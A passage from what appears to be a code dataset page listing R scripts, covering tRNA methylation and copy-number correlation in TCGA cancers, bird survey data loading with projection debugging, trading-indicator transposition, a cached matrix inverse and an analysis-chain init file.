values[x,merged_value_idx],method = "spearman",use="na.or.complete")))
colnames(correlations) = "Spearman CNA"
write.csv(correlations,"results/trnaH_CNA_corr_allsamples.csv") | /healthy/11-2_analyze_scna_methylation_allsamples.R | no_license | mywanuo/tRNA_TCGA | R | false | false | 4,694 | r | change_chr <- function(chromosome){
chr = strsplit(chromosome,"_|\\.|-")[[1]][1]
chrnumb = substr(chr,4,5)
return(chrnumb)
}
# Filter amino-acid rows and apply a variance-stabilising transformation.
#
# Rows of 'data' are kept only when their name starts with a code of the
# form "i?XyzABC" (optional "i" prefix, capitalised three-letter amino acid,
# three-letter anticodon), e.g. "AlaAGC" or "iMetCAT".
#
# Args:
#   data:   data frame (samples in columns, tRNA features in rows)
#   transf: one of "log", "arcsinh", "sqrt" (element-wise transforms) or
#           "rel" (per-amino-acid relative abundance); any other value
#           returns the filtered data unchanged.
#
# Returns: a matrix for the element-wise transforms (row names preserved),
#   a data frame for "rel", or the filtered input for an unknown 'transf'.
transformdata <- function(data, transf) {
  # grepl() with a "^" anchor is equivalent to regexpr(...) == 1 (the match
  # must start at the first character) but states the intent directly.
  aa_idx <- grepl("^i?[A-Z][a-z]{2}[A-Z]{3}", rownames(data))
  data <- data[aa_idx, ]
  if (transf == "log") {
    outdata <- sapply(data, log)
    # log(0) gives -Inf; recode as NaN so downstream na.rm handling works
    outdata[outdata == -Inf] <- NaN
    rownames(outdata) <- rownames(data)
  } else if (transf == "arcsinh") {
    outdata <- sapply(data, asinh)
    rownames(outdata) <- rownames(data)
  } else if (transf == "sqrt") {
    outdata <- sapply(data, sqrt)
    rownames(outdata) <- rownames(data)
  } else if (transf == "rel") {
    # Relative abundance within each amino acid: each row is divided by the
    # per-sample total over all rows of the same amino acid.
    outdata <- data.frame(matrix(ncol = ncol(data), nrow = nrow(data)),
                          row.names = rownames(data))
    colnames(outdata) <- colnames(data)
    # Amino acid = row name minus its trailing 3-letter anticodon
    aa <- sapply(rownames(outdata), function(x) substr(x, 1, nchar(x) - 3))
    uniqueaa <- unique(aa)
    for (n in uniqueaa) {
      idx <- (aa %in% n)
      idx_data <- matrix(as.matrix(data[idx, ]), ncol = ncol(data), nrow = sum(idx))
      total <- colSums(idx_data)
      outdata[idx, ] <- t(apply(idx_data, 1, function(x) x / total))
      # Samples whose total is zero would give 0/0; assign the uniform
      # share 1/(number of rows in the group) instead.
      iszero <- (total %in% 0)
      if (any(iszero)) {
        outdata[idx, iszero] <- 1.0 / sum(idx)
      }
    }
  } else {
    outdata <- data
  }
  return(outdata)
}
# Collapse rows sharing the same anticodon into their per-column mean.
# The anticodon label is the second "-"-separated token of each row name.
# Returns a matrix with one row per unique anticodon (NAs ignored).
mean_anticodon <- function(df) {
  acod <- vapply(rownames(df), function(nm) strsplit(nm, "-")[[1]][2],
                 character(1))
  per_acod <- sapply(unique(acod),
                     function(a) colMeans(df[acod == a, ], na.rm = TRUE))
  t(per_acod)
}
# Load data
cancer_types = c(BRCA="BRCA",PRAD="PRAD",kidney="KICH;KIRP;KIRC",lung="LUAD;LUSC",HNSC="HNSC",uterus="UCEC;CESC",
liver="LIHC;CHOL",THCA="THCA",colorectal="COAD;READ",ESCA="ESCA",STAD="STAD",BLCA="BLCA",PAAD="PAAD",THYM="THYM",
SKCM="SKCM",PCPG="PCPG")
path="/users/lserrano/xhernandez/tRNA_methylation/"
trna_coord = read.csv(paste0(path,"Data/Genomes/H.sapiens/hg19.tRNAscan.bed12"), sep="\t", header = F, row.names = 4)
trna_coord$V1 = sapply(as.character(trna_coord$V1),change_chr)
# tRNAs
trna = read.csv("data/TCGAall_nomod.csv",row.names = 1)
anticodon = transformdata(trna,"sqrt")
# Keep unique coordinates
genes = rownames(unique(trna_coord[,c(1,2,3)]))
## Analyze methylation
rm(rawvalues)
for (type in names(cancer_types)){
# Get data
if (exists("rawvalues")){
add = read.csv(sprintf("%sResults/%s_trnas_TSS1500meth.csv",path,type), row.names = 1)
rawvalues = cbind(rawvalues,add)
}else{
rawvalues = read.csv(sprintf("%sResults/%s_trnas_TSS1500meth.csv",path,type), row.names = 1)
}
}
# Average by anticodons
rawvalues = rawvalues[genes,]
values = mean_anticodon(rawvalues)
# Match samples
trna_samples = sapply(colnames(anticodon), function(x) paste(strsplit(x,"\\.")[[1]][2:5],collapse="."))
value_samples = substr(colnames(values),1,16)
merged_trna = colnames(anticodon)[trna_samples %in% value_samples]
merged_value_idx = sapply(trna_samples[trna_samples %in% value_samples], function(x) which(x==value_samples))
# Match anticodons
acods = rownames(values)[rownames(values) %in% rownames(anticodon)]
# Calculate correlation with expression
correlations = data.frame(sapply(acods,function(x) cor(anticodon[x,merged_trna],
values[x,merged_value_idx],method = "spearman",use="na.or.complete")))
colnames(correlations) = "Spearman Methylation"
write.csv(correlations,"results/trnaH_methylation_corr_allsamples.csv")
## Analyze CNA
path="/users/lserrano/xhernandez/tRNA_scna/"
rm(rawvalues)
for (type in names(cancer_types)){
# Get data
if (exists("rawvalues")){
add = read.csv(sprintf("%sResults/%s_trnas_cna.csv",path,type), row.names = 1)
rawvalues = cbind(rawvalues,add)
}else{
rawvalues = read.csv(sprintf("%sResults/%s_trnas_cna.csv",path,type), row.names = 1)
}
}
# Average by anticodons
rawvalues = rawvalues[genes,]
values = mean_anticodon(rawvalues)
# Match samples
trna_samples = sapply(colnames(anticodon), function(x) paste(strsplit(x,"\\.")[[1]][2:5],collapse="."))
value_samples = substr(colnames(values),1,16)
merged_trna = colnames(anticodon)[trna_samples %in% value_samples]
merged_value_idx = sapply(trna_samples[trna_samples %in% value_samples], function(x) which(x==value_samples))
# Match anticodons
acods = rownames(values)[rownames(values) %in% rownames(anticodon)]
# Calculate correlation with expression
correlations = data.frame(sapply(acods,function(x) cor(anticodon[x,merged_trna],
values[x,merged_value_idx],method = "spearman",use="na.or.complete")))
colnames(correlations) = "Spearman CNA"
write.csv(correlations,"results/trnaH_CNA_corr_allsamples.csv") |
# loadData Function
loadCroppedData <- function(sim = sim, studyArea = sim$studyArea,
dataPath = file.path(modulePath(sim), "prepingInputs/data"),
locationDataName = sim$locationDataName,
dataName = sim$dataName){
require(data.table)
require(raster)
require(sf)
require(reproducible)
dPath <- file.path(dataPath, dataName)
lPath <- file.path(dataPath, locationDataName)
if (!file.exists(dPath)){
invisible(readline(prompt="Make sure you have the dataset in Google Drives folder 'BAM', and press [enter] to continue"))
require(googledrive)
drive_download(file.path("BAM",dataName), path = dPath, overwrite = FALSE, verbose = FALSE)}
if (grepl(x = dPath, pattern = ".RData")){
birdData <- data.table(load(dPath))
birdData <- as.data.table(get(birdData[,V1]))
} else if (grepl(x = dPath, pattern = ".rds")){
birdData <- as.data.table(readRDS(dPath))
} else if (grepl(x = dPath, pattern = ".csv")){
birdData <- fread(dPath)
} else stop("The only accepted data formats for now are: '.RData', '.csv', '.rds'")
if (!any(names(birdData)=="X")&!file.exists(lPath)){
invisible(readline(prompt= paste0("Location (X, Y) was not found in data file. ",
"Please make sure you have the location dataset ('*.RData', '*.csv', '*.rds')",
"with at least X, Y and 'SS_derived' or equivalent 'SS' ",
"in Google Drives folder 'BAM', and press [enter] to continue")))
require(googledrive)
drive_download(file.path("BAM",data), path = lPath, overwrite = FALSE, verbose = FALSE)}
if (grepl(x = lPath, pattern = ".RData")){
locationData <- data.table(load(lPath))
locationData <- as.data.table(get(locationData[,V1]))
} else if (grepl(x = lPath, pattern = ".rds")){
locationData <- as.data.table(readRDS(lPath))
} else if (grepl(x = lPath, pattern = ".csv")){
locationData <- fread(lPath)
} else stop("The only accepted data formats for now are: '.RData', '.csv', '.rds'")
bdSS <- unique(birdData[,SS_derived])
location <- subset(x = locationData,
subset = SS %in% bdSS,
select = c(SS,X_coor,Y_coor)) %>%
unique()
names(location) <- c("SS_derived", "X", "Y")
birdData <- merge(x = birdData, y = location, by = "SS_derived")
# reproject studyArea to match data
# ============= ALL BELOW FAILED SO FAR ======================
browser()
# Getting only the points
points <- data.frame(X = birdData$X, Y = birdData$Y) %>%
SpatialPoints()
epsg32610 <- "+init=epsg:32610" # NEED TO TRY THIS. THIS IS UTM. It is possible this is the projection, considering the data comes from GP
epsg3857 <- "+init=epsg:3857" # Google maps, etc...
epsg4267 <- "+init=epsg:4267"
epsg4326 <- "+init=epsg:4326"
epsg4269 <- "+init=epsg:4269"
LCC05 <- "+proj=lcc +lat_1=49 +lat_2=77 +lat_0=0 +lon_0=-95 +x_0=0 +y_0=0 +ellps=GRS80 +units=m +no_defs"
LambertsConformalConic <- "+proj=lcc +lat_1=49 +lat_2=77 +lat_0=0 +lon_0=-95 +x_0=0 +y_0=0 +ellps=GRS80 +units=m +no_defs"
# Already tried: original data, all the following projections, transforming both points and rasters and shapefile.
# Nothing worked.
studyAreaToCrop <- Cache(prepInputs, url = sim$url.studyArea,
destinationPath = sim$tempPath.studyArea) %>%
selectSpecificAreas(specificAreas = sim$specificAreaToCropShapefile)
# TRANSFORMING POINTS (wich appear to not have a projection) --> Still not aligning
pointsDF <- data.frame(X = birdData$X, Y = birdData$Y)
coordinates(pointsDF) <- ~X+Y
projection(pointsDF) <- "+init:epsg=4326"
pointsTrans <- spTransform(pointsDF, CRS(projection(sim$vegMap)))
# TRYING SHAPEFILE SENT BY DIANA --> It's not the original projection from the points
require(rgdal)
newSHPPath <- "/home/tmichele/Documents/GitHub/birdsBECzonesBC/modules/prepingInputs/data/province_state_lcc.shp"
newSHP <- readOGR(newSHPPath)
naStates <- subset(newSHP, is.na(STATE))
studyAreaToCrop <- sp::spTransform(studyAreaToCrop, CRSobj = LambertsConformalConic)
studyAreaToCropSHP <- sp::spTransform(naStates, CRSobj = epsg4267) #and also tested all other projections...
plot(studyAreaToCrop) #or nStates
plot(points, add= TRUE , col = 'red', pch = 19, cex = 0.5) #or pointsTrans with vegMap plot
# ============= ALL FAILED SO FAR ======================
xmin <- raster::extent(studyAreaToCrop)[1]
xmax <- raster::extent(studyAreaToCrop)[2]
ymin <- raster::extent(studyAreaToCrop)[3]
ymax <- raster::extent(studyAreaToCrop)[4]
birdData2 <- birdData[birdData$X>xmin & birdData$X<xmax &
birdData$Y>ymin & birdData$Y<ymax,] # THERE ARE POINTS (Nicole's map showed it!), I JUST DONT KNOW WHY THESE ARE NOT BEING SELECTED...
if (nrow(birdData)==0){
stop("The selected area doesn't contain data. Try increasing the area.")
}
return(birdData)
} | /modules/prepingInputs/R/loadCroppedData.R | no_license | tati-micheletti/birdsBECzonesBC | R | false | false | 5,091 | r | # loadData Function
loadCroppedData <- function(sim = sim, studyArea = sim$studyArea,
dataPath = file.path(modulePath(sim), "prepingInputs/data"),
locationDataName = sim$locationDataName,
dataName = sim$dataName){
require(data.table)
require(raster)
require(sf)
require(reproducible)
dPath <- file.path(dataPath, dataName)
lPath <- file.path(dataPath, locationDataName)
if (!file.exists(dPath)){
invisible(readline(prompt="Make sure you have the dataset in Google Drives folder 'BAM', and press [enter] to continue"))
require(googledrive)
drive_download(file.path("BAM",dataName), path = dPath, overwrite = FALSE, verbose = FALSE)}
if (grepl(x = dPath, pattern = ".RData")){
birdData <- data.table(load(dPath))
birdData <- as.data.table(get(birdData[,V1]))
} else if (grepl(x = dPath, pattern = ".rds")){
birdData <- as.data.table(readRDS(dPath))
} else if (grepl(x = dPath, pattern = ".csv")){
birdData <- fread(dPath)
} else stop("The only accepted data formats for now are: '.RData', '.csv', '.rds'")
if (!any(names(birdData)=="X")&!file.exists(lPath)){
invisible(readline(prompt= paste0("Location (X, Y) was not found in data file. ",
"Please make sure you have the location dataset ('*.RData', '*.csv', '*.rds')",
"with at least X, Y and 'SS_derived' or equivalent 'SS' ",
"in Google Drives folder 'BAM', and press [enter] to continue")))
require(googledrive)
drive_download(file.path("BAM",data), path = lPath, overwrite = FALSE, verbose = FALSE)}
if (grepl(x = lPath, pattern = ".RData")){
locationData <- data.table(load(lPath))
locationData <- as.data.table(get(locationData[,V1]))
} else if (grepl(x = lPath, pattern = ".rds")){
locationData <- as.data.table(readRDS(lPath))
} else if (grepl(x = lPath, pattern = ".csv")){
locationData <- fread(lPath)
} else stop("The only accepted data formats for now are: '.RData', '.csv', '.rds'")
bdSS <- unique(birdData[,SS_derived])
location <- subset(x = locationData,
subset = SS %in% bdSS,
select = c(SS,X_coor,Y_coor)) %>%
unique()
names(location) <- c("SS_derived", "X", "Y")
birdData <- merge(x = birdData, y = location, by = "SS_derived")
# reproject studyArea to match data
# ============= ALL BELOW FAILED SO FAR ======================
browser()
# Getting only the points
points <- data.frame(X = birdData$X, Y = birdData$Y) %>%
SpatialPoints()
epsg32610 <- "+init=epsg:32610" # NEED TO TRY THIS. THIS IS UTM. It is possible this is the projection, considering the data comes from GP
epsg3857 <- "+init=epsg:3857" # Google maps, etc...
epsg4267 <- "+init=epsg:4267"
epsg4326 <- "+init=epsg:4326"
epsg4269 <- "+init=epsg:4269"
LCC05 <- "+proj=lcc +lat_1=49 +lat_2=77 +lat_0=0 +lon_0=-95 +x_0=0 +y_0=0 +ellps=GRS80 +units=m +no_defs"
LambertsConformalConic <- "+proj=lcc +lat_1=49 +lat_2=77 +lat_0=0 +lon_0=-95 +x_0=0 +y_0=0 +ellps=GRS80 +units=m +no_defs"
# Already tried: original data, all the following projections, transforming both points and rasters and shapefile.
# Nothing worked.
studyAreaToCrop <- Cache(prepInputs, url = sim$url.studyArea,
destinationPath = sim$tempPath.studyArea) %>%
selectSpecificAreas(specificAreas = sim$specificAreaToCropShapefile)
# TRANSFORMING POINTS (wich appear to not have a projection) --> Still not aligning
pointsDF <- data.frame(X = birdData$X, Y = birdData$Y)
coordinates(pointsDF) <- ~X+Y
projection(pointsDF) <- "+init:epsg=4326"
pointsTrans <- spTransform(pointsDF, CRS(projection(sim$vegMap)))
# TRYING SHAPEFILE SENT BY DIANA --> It's not the original projection from the points
require(rgdal)
newSHPPath <- "/home/tmichele/Documents/GitHub/birdsBECzonesBC/modules/prepingInputs/data/province_state_lcc.shp"
newSHP <- readOGR(newSHPPath)
naStates <- subset(newSHP, is.na(STATE))
studyAreaToCrop <- sp::spTransform(studyAreaToCrop, CRSobj = LambertsConformalConic)
studyAreaToCropSHP <- sp::spTransform(naStates, CRSobj = epsg4267) #and also tested all other projections...
plot(studyAreaToCrop) #or nStates
plot(points, add= TRUE , col = 'red', pch = 19, cex = 0.5) #or pointsTrans with vegMap plot
# ============= ALL FAILED SO FAR ======================
xmin <- raster::extent(studyAreaToCrop)[1]
xmax <- raster::extent(studyAreaToCrop)[2]
ymin <- raster::extent(studyAreaToCrop)[3]
ymax <- raster::extent(studyAreaToCrop)[4]
birdData2 <- birdData[birdData$X>xmin & birdData$X<xmax &
birdData$Y>ymin & birdData$Y<ymax,] # THERE ARE POINTS (Nicole's map showed it!), I JUST DONT KNOW WHY THESE ARE NOT BEING SELECTED...
if (nrow(birdData)==0){
stop("The selected area doesn't contain data. Try increasing the area.")
}
return(birdData)
} |
## FUNCTION create_transposed_data
## PURPOSE: function gets indicator data in each column
## it is splitting this data by periods and transpose the data.
## additionally it is label the data based on the simple logic assigning it to 2 categories based on the difference
## between beginning and end of the vector
## finally it is stacking all data and joining everything into the table
## TEST:
# library(tidyverse)
# library(lubridate)
# pathT2 <- "C:/Program Files (x86)/FxPro - Terminal2/MQL4/Files/"
# macd <- read_csv(file.path(pathT2, "AI_Macd1.csv"), col_names = F)
# macd$X1 <- ymd_hms(macd$X1)
# write_rds(macd, "test_data/macd.rds")
#' Create Transposed Data
#' https://www.udemy.com/self-learning-trading-robot/?couponCode=LAZYTRADE7-10
#'
#' @param x - data set containing a table where 1st column is a Time index and other columns containing financial asset indicator values
#' @param n - number of rows we intend to split and transpose the data
#'
#' @return function returns transposed data. Transposed values from every column are stacked one to each other
#' @export
#'
#' @examples
#'
#' Create Transposed Data
#' https://www.udemy.com/self-learning-trading-robot/?couponCode=LAZYTRADE7-10
#'
#' Splits an indicator table into consecutive n-row chunks (dropping the
#' time-index first column and the trailing, possibly incomplete, chunk)
#' and stacks the transposed chunks into a single tibble.
#'
#' @param x - data set containing a table where 1st column is a Time index and other columns containing financial asset indicator values
#' @param n - number of rows we intend to split and transpose the data
#'
#' @return function returns transposed data. Transposed values from every column are stacked one to each other
#' @export
#'
#' @examples
#'
create_transposed_data <- function(x, n = 50){
  require(tidyverse)
  nr <- nrow(x)
  # split into consecutive n-row chunks, time column removed
  dat11 <- x %>% select(-1) %>% split(rep(1:ceiling(nr/n), each=n, length.out=nr)) #list
  dat11[length(dat11)] <- NULL  # drop the last (possibly partial) chunk
  # Accumulate into a local variable initialised to NULL.  The previous
  # exists("dfr12") check also matched any 'dfr12' lying around in the
  # calling/global environment, silently corrupting the first iteration.
  dfr12 <- NULL
  for (i in seq_along(dat11)) {  # seq_along() is safe when dat11 is empty
    if (is.null(dfr12)) {
      dfr12 <- dat11[i] %>% as.data.frame() %>% t() %>% as_tibble()
    } else {
      # each new chunk is stacked on top, matching the original row order
      dfr12 <- dat11[i] %>% as.data.frame() %>% t() %>% as_tibble() %>% bind_rows(dfr12)
    }
  }
  return(dfr12)
}
| /create_transposed_data.R | permissive | surapoom/R_selflearning | R | false | false | 1,710 | r | ## FUNCTION create_transposed_data
## PURPOSE: function gets indicator data in each column
## it is splitting this data by periods and transpose the data.
## additionally it is label the data based on the simple logic assigning it to 2 categories based on the difference
## between beginning and end of the vector
## finally it is stacking all data and joining everything into the table
## TEST:
# library(tidyverse)
# library(lubridate)
# pathT2 <- "C:/Program Files (x86)/FxPro - Terminal2/MQL4/Files/"
# macd <- read_csv(file.path(pathT2, "AI_Macd1.csv"), col_names = F)
# macd$X1 <- ymd_hms(macd$X1)
# write_rds(macd, "test_data/macd.rds")
#' Create Transposed Data
#' https://www.udemy.com/self-learning-trading-robot/?couponCode=LAZYTRADE7-10
#'
#' @param x - data set containing a table where 1st column is a Time index and other columns containing financial asset indicator values
#' @param n - number of rows we intend to split and transpose the data
#'
#' @return function returns transposed data. Transposed values from every column are stacked one to each other
#' @export
#'
#' @examples
#'
create_transposed_data <- function(x, n = 50){
  # Attach tidyverse for %>%, select(), as.tibble(), bind_rows().
  # NOTE(review): require() inside a function attaches packages as a side
  # effect and returns FALSE (instead of erroring) when tidyverse is absent.
  require(tidyverse)
  #n <- 50
  #x <- read_rds("test_data/macd.rds")
  nr <- nrow(x)
  # Drop the time-index column (column 1) and split the remaining rows into
  # consecutive chunks of n rows each, giving a named list of data frames.
  dat11 <- x %>% select(-1) %>% split(rep(1:ceiling(nr/n), each=n, length.out=nr)) #list
  # NOTE(review): this removes the last chunk unconditionally — a complete
  # chunk is lost whenever nr is an exact multiple of n.
  dat11[length(dat11)] <- NULL
  # operations within the list: transpose each chunk (indicator columns
  # become rows) and stack the results.
  for (i in 1:length(dat11)) {
    #i <- 1
    # NOTE(review): exists("dfr12") also searches enclosing environments, so
    # a global variable named dfr12 would be silently bound into the result.
    # NOTE(review): as.tibble() is deprecated in favour of as_tibble(), and
    # bind_rows(dfr12) appends the PREVIOUS rows after the new chunk, so the
    # final chunk order comes out reversed — confirm this is intended.
    if(!exists("dfr12")){
      dfr12 <- dat11[i] %>% as.data.frame() %>% t() %>% as.tibble() } else {
        dfr12 <- dat11[i] %>% as.data.frame() %>% t() %>% as.tibble() %>% bind_rows(dfr12)
      }
  }
  return(dfr12)
}
|
## The makeCacheMatrix function takes a given matrix and creates a special
## matrix that has an inverse to be calculated. The cacheSolve function
## will take the special matrix, find its inverse and store the inverse
## into a cache. This will allow the inverse to be quickly found later if
## asked for, avoiding the timely process of calculating the inverse again.
## makeCacheMatrix builds a "cache-aware" matrix: a list of four closures
## that share the matrix `x` and its lazily computed inverse through their
## common enclosing environment.  `set` replaces the matrix and invalidates
## the cached inverse; `get` returns the matrix; `setinverse` stores a
## computed inverse; `getinverse` returns the cached inverse (NULL until one
## has been stored).  Returning a named list lets callers use the `$`
## accessor, e.g. m$get().
makeCacheMatrix <- function(x = matrix()) {
  inv <- NULL
  set <- function(y) {
    # Rebind the matrix in the enclosing environment and drop the stale
    # cached inverse so it will be recomputed on demand.
    x <<- y
    inv <<- NULL
  }
  get <- function() {
    x
  }
  setinverse <- function(solve) {
    inv <<- solve
  }
  getinverse <- function() {
    inv
  }
  list(set = set,
       get = get,
       setinverse = setinverse,
       getinverse = getinverse)
}
## cacheSolve returns the inverse of the matrix held in an object created by
## makeCacheMatrix().  On a cache hit it announces "getting cached data" and
## returns the stored inverse without recomputing; on a cache miss it
## computes the inverse with solve(), stores it in the object's cache, and
## returns it.  Extra arguments in `...` are forwarded to solve().
cacheSolve <- function(x, ...) {
  cached <- x$getinverse()
  # Cache hit: skip the (potentially expensive) solve() call entirely.
  if (!is.null(cached)) {
    message("getting cached data")
    return(cached)
  }
  # Cache miss: compute the inverse, remember it for next time, return it.
  mat <- x$get()
  inverse <- solve(mat, ...)
  x$setinverse(inverse)
  inverse
}
| /cachematrix.R | no_license | RosieVE/ProgrammingAssignment2 | R | false | false | 2,416 | r | ## The makeCacheMatrix function takes a given matrix and creates a special
## matrix that has an inverse to be calculated. The cacheSolve function
## will take the special matrix, find its inverse and store the inverse
## into a cache. This will allow the inverse to be quickly found later if
## asked for, avoiding the timely process of calculating the inverse again.
## The first function, makeCacheMatrix, takes a matrix as its argument.
## It first initializes the inverse, 'i', to NULL. Nested in the function is
## the function 'set', which puts the matrix and its inverse into the parent
## environment. The function 'get' then returns the matrix. The function
## 'setinverse' stores the inverse in 'i' in the parent environment. The
## function 'getinverse' then returns the inverse matrix 'i'. Lastly, the
## function creates a list to set all of the nested functions to their
## names, which allows for the use of the '$' operator if desired.
makeCacheMatrix <- function(x = matrix()) {
        i <- NULL
        set <- function(y){
                x <<- y
                i <<- NULL
                ## '<<-' operator puts x and i in parent environment;
                ## clearing i invalidates any previously cached inverse
        }
        get <- function() x
        ## NOTE(review): the parameter name 'solve' shadows base::solve here
        setinverse <- function(solve) i <<- solve
        ## set i to the inverse in the parent environment
        getinverse <- function() i
        list(set = set, get = get, setinverse = setinverse,
             getinverse = getinverse)
        ## setting the names allows us to use '$' operator
}
## The second function, cacheSolve, takes a matrix of the type
## makeCacheMatrix() as its argument. This means the original matrix must
## be the result of the previous makeCacheMatrix function. It first
## initializes 'i' to the inverse. If the inverse is not NULL, it will be
## returned from the cache. If the inverse is NULL (meaning it hasn't been
## calculated previously), the solve function will calculate the inverse of
## the matrix and initialize it to 'i'. 'i' will then be set as the inverse
## for the matrix in the cache. The inverse will then be printed out.
cacheSolve <- function(x, ...) {
        i <- x$getinverse()
        ## Cache hit: announce it and return the stored inverse unchanged
        if(!is.null(i)) {
                message("getting cached data")
                return(i)
        }
        ## Cache miss: compute the inverse, store it in the cache, return it
        data <- x$get()
        i <- solve(data, ...)
        x$setinverse(i)
        i
}
|
# sqldf configuration: select the SQLite driver so sqldf can query
# in-memory data frames, and force the pure-R gsubfn engine.
# See https://code.google.com/p/sqldf/#Troubleshooting
options(
  sqldf.driver = "SQLite",
  gsubfn.engine = "R"
)
#**
#* Check if the execution of a task returned an error.
#*
#* If `e` is a try() failure or a simpleError condition, print an
#* "ARENA-ERROR" marker line (the exact text is part of the contract with
#* the calling process) and re-signal the error; otherwise do nothing.
#*
#* @param e  any value, typically the result of try() or tryCatch()
#* @return   invisible NULL when e is not an error; otherwise stops
#**
checkError <- function(e) {
  if (inherits(e, "try-error") || inherits(e, "simpleError")) {
    # quote = FALSE (spelled out: F is a reassignable alias) so the marker
    # is printed without surrounding quotes.
    print("ARENA-ERROR", quote = FALSE)
    stop(e)
  }
  invisible(NULL)
}
#**
#* Extracts the content of a file and returns it as an SQL quoted string.
#* Currently a stub: the whole body is commented out (TODO below), so the
#* function returns NULL invisibly no matter what `filename` is passed.
#**
arena.getQuotedFileContent <- function(filename) {
  # TODO
  # The draft below reads the file as UTF-8, joins the lines with a
  # placeholder token, SQL-quotes the result, then restores real newlines.
  # It presumably depends on `scriptDir` and `connection` being defined in
  # an enclosing scope — confirm before re-enabling.
  # newLinePlaceHolder <- 'ARENA_NEW_LINE_PLACEHOLDER'
  #
  # filePath <- paste(scriptDir, filename, sep = .Platform$file.sep)
  #
  # c <- file(filePath, encoding = "UTF-8")
  # fileContent <- paste(readLines(c, warn = F), collapse = newLinePlaceHolder)
  # close(c)
  #
  # fileContent <- dbQuoteString(conn = connection, x = fileContent)
  # fileContent <- gsub(newLinePlaceHolder, '\n', fileContent)
  #
  # return(fileContent)
}
# Processing chain starting time, recorded once when this file is sourced
# (presumably so later steps can report elapsed duration — confirm usage).
arena.startTime <- Sys.time()
| /server/modules/analysis/service/rChain/rFile/system/init-chain.R | permissive | Dawa406/arena | R | false | false | 1,037 | r | # sqldf options.
# driver is set to SQLite in order to read directly from a data frame
# https://code.google.com/p/sqldf/#Troubleshooting
options(
  gsubfn.engine = "R",
  sqldf.driver = "SQLite"
)
#**
#* Check if the execution of a task returned an error.
#* On a try() failure or simpleError condition, prints an "ARENA-ERROR"
#* marker line (scanned by the calling process) and re-signals the error;
#* otherwise does nothing.
#**
checkError <- function(e) {
  if (inherits(e, "try-error") || inherits(e, "simpleError")) {
    # NOTE(review): prefer quote = FALSE over the reassignable alias F
    print("ARENA-ERROR", quote = F)
    stop(e)
  }
}
#**
#* Extracts the content of a file and returns it as an SQL quoted string.
#* Currently a stub: the whole body is commented out (TODO below), so the
#* function returns NULL invisibly no matter what `filename` is passed.
#**
arena.getQuotedFileContent <- function(filename) {
  # TODO
  # The draft below reads the file as UTF-8, joins the lines with a
  # placeholder token, SQL-quotes the result, then restores real newlines.
  # It presumably depends on `scriptDir` and `connection` being defined in
  # an enclosing scope — confirm before re-enabling.
  # newLinePlaceHolder <- 'ARENA_NEW_LINE_PLACEHOLDER'
  #
  # filePath <- paste(scriptDir, filename, sep = .Platform$file.sep)
  #
  # c <- file(filePath, encoding = "UTF-8")
  # fileContent <- paste(readLines(c, warn = F), collapse = newLinePlaceHolder)
  # close(c)
  #
  # fileContent <- dbQuoteString(conn = connection, x = fileContent)
  # fileContent <- gsub(newLinePlaceHolder, '\n', fileContent)
  #
  # return(fileContent)
}
# Processing chain starting time, recorded once when this file is sourced
# (presumably so later steps can report elapsed duration — confirm usage).
arena.startTime <- Sys.time()
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.